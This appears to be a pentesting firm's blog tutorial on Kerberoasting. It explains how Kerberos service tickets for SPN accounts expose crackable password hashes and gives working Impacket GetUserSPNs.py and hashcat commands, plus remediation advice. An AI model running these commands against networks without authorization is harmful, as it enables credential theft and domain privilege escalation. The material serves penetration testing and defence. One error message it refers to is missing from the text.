Welcome back to our “Back to Basics” series, where we provide you with an overview of the bread and butter pentesting techniques that we regularly see compromise networks. In this week’s installment, we’re looking at Kerberoasting.
Kerberoasting is a method to capture hashed passwords using the Kerberos network authentication protocol. This protocol protects network services by allowing users and servers to verify each other’s identity.
An attacker connected to the network can exploit this protocol by requesting Kerberos tickets for accounts configured with service principal names (SPNs). A portion of these tickets contain data encrypted with the NTLM hash of the targeted account, meaning an attacker can attempt to crack them to plaintext in order to obtain the user’s password. If the service account passwords are weak, then an attacker will likely crack them. Kerberos requests are common, and an attacker can often capture these hashed passwords without detection.
Kerberoasting is a valuable attack vector for testers because network administrators often neglect to remove local administrator, or even domain administrator, rights from the service accounts with SPNs. If you can compromise one of these service accounts you will likely gain administrative access.
How to Perform Kerberoasting
Once you have gained initial access to a low-privileged user account, look for service accounts configured with SPNs (utilizing GEtUserSPNs.py which is part of the Impacket suite):
GetUserSPNs.py example.com/username:password -request -dc-ip <target dc ip> -outputfile kerberoasting.txt
If you find this error from Linux:
it is because of your local time and you need to synchronize the host with the DC:
ntpdate <IP of target DC>
Crack Kerberos tickets with hashcat:
# all tickets must be on their own line
hashcat -m 13100 kerberoasting.txt rockyou2021.txt -r rules\InsidePro-HashManager.rule -O –force -w 3
Also see our past article, Lateral Movement with Low Privilege Shell for Red Teams.
How to Remediate
We recommend removing SPNs from all domain administrator accounts and creating a dedicated nonhuman account with a long and complex password with the minimum necessary privileges to run the service.
This article was written by Kristen Gecewich, with a special thanks to Hunter Ezzell for providing images and technical expertise.